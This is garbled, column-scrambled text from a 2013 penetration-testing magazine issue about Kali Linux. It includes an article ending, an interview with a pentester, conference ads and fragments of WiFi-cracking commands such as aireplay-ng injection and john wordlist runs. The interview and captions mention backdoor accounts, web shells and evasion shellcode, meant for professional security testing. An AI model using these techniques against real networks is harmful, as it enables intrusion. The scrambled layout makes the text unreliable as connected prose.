Dradis we ensure that we output all tools to text or can output reports in HTML and Word documents.
XML files as well as take screen-shots where tool The screen-shot below should give you the idea
output is less efficient. (Figure 25).
Some tools provide self documenting features.
Take Metasploit for instance. It provides a data- Conclusion
base that captures output from various tools as Kali is a valuable resource when performing pen-
you progress through your penetration test. In ad- etration testing. Sometimes the tools can seem a
dition, Meterpreter has the screenshot feature that bit overwhelming. Leveraging a methodology such
as NIST 800-115 will bring some consistency and
continuity to your penetration tests.
While we did not cover every tool on the distribu-
Figure 20. Atftpd Startup on Kali For Tool Delivery tion nor demonstrate all mapped tools in our ex-
ample we hope this brief introduction will help you
formulate a plan of attack when using Kali on en-
gagements, so that you bring a better deliverable
to your clients.
Jeff Weekes
Jeff has over 15 years of IT and security services experience. He
currently performs penetration testing, web application secu-
Figure 21. Backdoor Account Creation on Target Host
rity assessment, security code review, security strategy, securi-
ty research, and incident / forensic / network forensic response
services for government contractors, financial institutions, re-
Figure 22. SBD Backdoor Setup On Target Host tail services, medical device manufacturers, contact centers,
cloud solution companies, and SaaS service companies.
Carlos Villalba
Carlos has over 17 years of solid IT. He has
Figure 23. SBD Kali Client Connection To Target Host extensive experience designing, develop-
ing, managing and implementing securi-
ty IT security solutions with its training and
security components in compliance with IT
Figure 24. Meterpreter Screenshot Example
security standards and best practices. Car-
loss experience provides and unique com-
bination of skills and experience. Carlos merged his experience
into the academic world by designing and delivering instruc-
tion and training at the graduate, undergraduate and profes-
sional level while being active IT security consultant. His expe-
rience includes Compliance Assessments, Pen-testing, IT secu-
rity projects, DIACAP Training Design, Oracle database perfor-
mance, Open Source Solutions for migration of Learning Man-
agement Systems and Database Management Systems. Ex-
pert knowledge level of windows based platforms and Red Hat
based systems. Solid experience with Active Directory, VPN,
SharePoint, Oracle RDBMS, MS SQL, web application security,
DNS, encryption, scripting, ISO17799 and PKI. He has provided
services to the Air Force Research Labs, Credit Unions, Universi-
Figure 25. Dradis Export Example ties, Manufacturing companies and small business.

EXTRA
Interview with
Jeff Weekes
Especially for you, we have interviewed a pentesting specialist
Jeff Weekes who has over 15 years of IT and security services
experience!
Kali is a superb tool for security experts Keeping tools updated can be a real challenge.
and pentesters. We would be interested to We decided long ago that the best method to en-
know how the tools are chosen and how sure consistent delivery is dedicated laptops for
theteam members work together to make assessments and penetration testing. Prior to an
the distro being updated? engagement we perform updates on the various
This is a great question! We often have to balance tools. Also, at the end of each engagement we se-
tool choices with functionality, cost, and resource curely delete the laptops, re-install baseline imag-
experience. After all we are inevitably in business es, and then update tools. In the near future we will
to make money. be rolling customized Kali images for our assess-
We like open-source tools as they provide a level ments. This will allow us to bake in our update rou-
of visibility into whats really happening. In addi- tines, leverage snapshots, and lastly minimize the
tion, it allows us to customize and script the tools need for additional hardware.
in a variety of ways. Most notably when it comes to
managing tool output for reporting. How are the comments of the users
In the end we leverage both open-source and treated by the team members who
commercial tools. Here is a quick run down of work on Kali when these users make
some of the tools we use in our war chest. suggestions or report bugs?
We take our clients feedback very seriously. In the
Kali -> Cant live without it!! event that we discover issues with what various
Nessus tools identify we immediately investigate the prob-
Qualys lem. Because many of the tools are open-source
Metaploit Community / Professional we can take a look at the underlying code. If we
Burpsuite identify the problem we attempt to notify the var-
Wireshark ious tool owners of through their bug reporting
channels. We will also update our team members
Customized scripts, shellcode, and commmand- so they are aware of the problem and can leverage
control applications to evade anti-malware con- different tools or techniques to ensure accuracy of
trols. our testing.

What you see as the most critical and
current theats affecting the Internet
today?
We continue to see a rise in focused attacks with
clear motivations by the actors. Often these at-
tacks take the form of malware deployed through
browser exploitation kits and targeted at specific
applications. Most of the attacks involve theft of fi-
nancial information such as credit-card numbers or
intellectual property.
What kind of resources Terra Verde uses to

keep abreast of web security issues?
Terra Verde uses a variety of resources to keep
tabs on evolving web security issues and web se-
curity attack techniques. Some of these resources
include Blackhat, Defcon, and OWASP. We also
receive threat feeds from Alien Vault and Emerging
Threats. Lastly, we spend a good amount of time
researching issues and topics located on various
sites on the net.
What are the examples of a recent web

security vulnerability or threats?
Even though there are great frameworks out there
such as Spring, Rails, and Django we still continue
to see SQL injection vulnerabilities. We also come
across our fair share of XSS related vulnerabilities.
In addition, we seem to find continued use of de-
fault passwords. Often these default passwords
are identified for admin accounts that are includ-
ed with various CMS frameworks. Once these ac-
count are compromised skys the limit. You can
often leverage this access to upload a web shell
and pivot from this system. For those starting out
in penetration testing never forget about default
passwords. They can be your best weapon to gain
initial access. For a good read on the power of de-
fault passwords and incident response pickup The
Cuckoos Egg. Its a bit dated but still a great read.
What are the challenges to successfully

deploying or monitoring web intrusion
detection?
Deploying web intrusion detection or web appli-
cation firewalls poses some interesting challeng-
es. The first being the use of SSL. When SSL is
in place it often masks your ability to see attacks
against the web environment. Once you shim or
decrypt the SSL session you are often exposed to
all sorts of interesting data such as passwords and
credit-card numbers. This data can find its way into
IDS and WAF logs and well as expose the data to
EXTRA 05/2013(16)
EXTRA
monitoring staff. Its a good idea to have a strat- Most of the people in my network have made the
egy on how to deal with data spill issues because switch to Kali and have nothing, but good things
they will eventually come up. We usually recom- to say.
mend data masking prior to log entry if the tech-
nology supports it or aggressive data scrubbing on Any idea on what can we expect from the
log files. Remember that the later may create log IT Security software developers? Are there
integrity issues as you have altered the logs. any gaps that need to be filled?
The second major issue is really understanding the Im excited to see where Dradis goes with there
application you are trying to protect. If you are not a SaaS based solution as well as the evolution of
web application developer you may need to become tools like MagicTree. I believe there is a real gap
one or at least understand how the application works around tools for reporting and data management.
at an in depth level. You also need to get the develop- Especially, with RedTeam engagements that in-
ment team involved early and often in the process to volve multiple penetration testers.
ensure successful buyin and deployment.
Do your friends, including IT specialists,
What are the most important steps he/ also have a positive opinion about Kali?
she would recommend for securing a web Most of the people in my network have made the
server or web application? switch to Kali and have nothing, but good things
The most important step in my mind is input vali- to say.
dation. I cant say it enough. Its critical that your
development teams understand the importance of Have you read our first issue of Kali Linux?
secure coding techniques and especially input val- Which of the methods described therein
idation. This can be a difficult challenge given most are you most interested in?
companies focus on application features and time I did read the first Kali issue. I have to say that I en-
to market. Web Application Firewalls can help, but joyed all the articles. My favorite was Kali Linux on
nothing beats securely developing the code in the a Raspberry Pi by Scott Cristie. Weve been look-
first place. Remember they dont and shouldnt re- ing at how we could deploy Kali on a small form
invent the wheel. There are some great frameworks factor for covert engagements and this article will
and libraries out there that can assist. Checkout give us a jump start on that endeavor.
several OWASP projects such as Enterprise Secu-
rity API (ESAPI) for additional details. What do you think about the future of
pentesting?
Does the platform produce potential I think penetration testing has a bright future. Tech-
threats? Do you have any precautions for nology is moving at an incredibly fast pace. Internet
the future users? enabled smartmeters, cars, and medical devices
Kali does produce some potential threats. Namely brings on new challenges and threats. If the past
around passwords and the potential services that is any indication then penetration test will be in de-
get enabled during the course of penetration test- mand. This shift in technology will require new skill-
ing. To limit both your and your clients exposure sets and techniques that penetration testers will
you should ensure the version/tools are updated, need to acquire in order to be successful. Im also
password protected (AKA Change the Default), excited about bug bounty programs coming from
and leverage a host firewall such as iptables. companies out of Silicon Valley as well as crowd-
In addition, we recommend encrypting the drive source initiatives from companies such as Synack.
where your artifacts reside as well as scrubbing There is some unique opportunity with these ini-
your penetration testing boxes or images after tiatives for freelance penetration testers to help
each engagement. You dont want to end up on strengthen the security postures of these compa-
the news for exposing your customers data. Es- nies and products while making some additional
pecially, data collected during the course of a pen- money.
etration test.
What do you think about the new set

of tools? Are you aware of the general
opinion about the platform? by Milena Bobrowska

A BZ Media Event
Big Data gets real

at Big Data TechCon!
Discover how to master Big Data from real-world practitioners instructors
who work in the trenches and can teach you from real-world experience!
Come to Big Data TechCon to learn the best ways to:

Collect, sort and store massive quantities Learn HOW TO integrate data-collection
Over 60
of structured and unstructured data technologies with analysis and
how-to sses
business-analysis tools to produce
Process real-time data pouring into
l cla the kind of workable information
your organization
practicautorials and reports your organization needs
and t ose
Master Big Data tools and technologies
to ch o Understand HOW TO leverage Big Data
like Hadoop, Map/Reduce, NoSQL from! to help your organization today
databases, and more
Big Data TechCon is loaded with great networking

opportunities and has a good mix of classes with technical
depth, as well as overviews. Its a good, technically-focused
conference for developers.
Kim Palko, Principal Product Manager, Red Hat
Big Data TechCon is great for beginners as well as

advanced Big Data practitioners. Its a great conference!
Ryan Wood, Software Systems Analyst, Government of Canada
San Francisco
If youre in or about to get into Big Data, this is the October 15-17, 2013
conference to go to.
Jimmy Chung, Manager, Reports Development, Avectra www.BigDataTechCon.com
The HOW-TO conference for Big Data and IT professionals
Big Data TechCon is a trademark of BZ Media LLC.

RE % us he
sim Y
15 ly S w
AD off e v n y
PW
@tmforumorg #dd13
p 1
ER a g ouc ou
4
OCTOBER 28-31, 2013
SP old her reg

EC pa co iste
SAN JOSE, CALIFORNIA
IA ss de r
L
Crashing the party -
digital services.
Enabling businesses and enterprises to conquer challenges and
seize opportunities presented by the digital world, Digital Disruption,
TM Forums all new, expanded event for the Americas, helps service
providers and their partners address vital issues such as reducing cost
and risk, improving market retention and growth and increasing revenue
by introducing innovative new services. Engage with 150+ expert speakers
over four days filled with critical insights, debate, TM Forum training, networking
and hands-on opportunities that immerse you in exciting innovations and new ideas.
Not your average conference Keynote Speakers include...

Four topic-driven Forums
- Agile Business and IT Forum
- Customer Engagement and Analytics Forum Chet Kapoor
- Delivering Enterprise Services Forum CEO, Apigee
- Disruptive Innovation Forum
Daniel Sieberg
Innovation Zone: Head of Media Outreach &
Explore all things TM Forum; meet companies that are Official Spokesperson, Google
seizing the opportunities the digital world is creating:
- Meet the experts, learn about TM Forum programs and Dr.Jrgen Meffert
explore our award-winning series of live Catalyst demos, Director (Senior Partner),
collaborative accelerator projects led by cutting edge service McKinsey & Company
providers and suppliers
- Touch and feel some of the latest disruptive technology Adrian Cockcroft
that is changing the way we live and work Director of Architecture, Cloud
Systems, Netflix
- Watch live demos and learn more about real digital services
that leverage the broad ecosystem
Georges Nahon
- Discover innovative technology from vendors CEO, Orange Silicon Valley
showcasing their best products and services
Vinay Vaidya, MD
Networking Vice President & Chief Medical
Information Officer,
Phoenix Childrens Hospital
TM Forum Training and MasterClasses
For more information or to register now: Platinum Sponsor:

Email: register@tmforum.org | Phone: +1 973 944 5100
Visit: www.tmforum.org/dd13PT

PenTest - Kali Linux 2 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

PenTest - Kali Linux 2 PDF

Загружено:

Авторское право:

Доступные форматы

Cyber Security Auditing Software

Although various tools exist that can

Ian has been working with leading global

W ith great pleasure, we present you this issue of

Editorial Advisory Board:

Senior Consultant/Publisher: Pawel Marciniak

All rights to trade marks presented in the

EXTRA 05/2013(16) Page 4 http://pentestmag.com

06In-Depth Review of the Kali Linux:

Kali Linux is a blessing for Penetration Testers worldwide.

16 Kali Linux Wi-Fi Testing

26Web Applications with Kali Linux

36Penetration testing with Linux

EXTRA 05/2013(16) Page 5 http://pentestmag.com

In Depth Review of the

What was wrong with Backtrack and why

EXTRA 05/2013(16) Page 6 http://pentestmag.com

File Hierarchy Standard Compliance

Customizations of Kali ISOs

EXTRA 05/2013(16) Page 7 http://pentestmag.com

Kali Community Support

Figure 5. Graphical Package Installer in Kali

EXTRA 05/2013(16) Page 8 http://pentestmag.com

Reduce Time, Reduce Cost, Reduce Risk

Embedded Software Design Services

For more information, contact us at

In Kali, there is no /pentest directory like in

EXTRA 05/2013(16) Page 10 http://pentestmag.com

EXTRA 05/2013(16) Page 11 http://pentestmag.com

Select the System option and the Processor

Kali Linux Installation to a hard disk inside

Install VirtualBox Guest Addition Tools in Kali

EXTRA 05/2013(16) Page 12 http://pentestmag.com

Creating Shared Folders with the Host System

Kali Linux Forensics Mode

The internal hard disk is not touched. This

EXTRA 05/2013(16) Page 13 http://pentestmag.com

Figure 7. acccheck_tool_cli Figure 10. detect_sniffer6_GUI_Access

Figure 8. acccheck_tool_GUI_Access Figure 11. dnsrevenum6_cli

Figure 9. detect_sniffer6_cli Figure 12. dnsrevenum6_GUI_Access

EXTRA 05/2013(16) Page 14 http://pentestmag.com

EXTRA 05/2013(16) Page 16 http://pentestmag.com

root@kali:~# lsb_release -r We first need to confirm we have a valid WiFi

root@kali:~# lsusb -v -s 001:010

This WiFi dongle is based on the Ralink 3070

Listing 1. Ralink 3070 chipset

EXTRA 05/2013(16) Page 17 http://pentestmag.com

lo Link encap:Local Loopback

wlan0 Link encap:Ethernet HWaddr 00:12:0e:9a:f3:07

Listing 3. Checking the WiFi dongle

lo Link encap:Local Loopback

EXTRA 05/2013(16) Page 18 http://pentestmag.com

root@kali:~# airodump-ng mon0

Let it run awhile and see what we pick up. What

EXTRA 05/2013(16) Page 19 http://pentestmag.com

Listing 4. Aireplay-ng injection checking

root@kali:~# aireplay-ng mon0 -a 28:C6:8E:69:A7:EE -9

EXTRA 05/2013(16) Page 20 http://pentestmag.com

EXTRA 05/2013(16) Page 21 http://pentestmag.com

EXTRA 05/2013(16) Page 22 http://pentestmag.com

root@kali:~# john -w:dic-0294.txt -stdout

Once again, the original deadbeef password is

EXTRA 05/2013(16) Page 23 http://pentestmag.com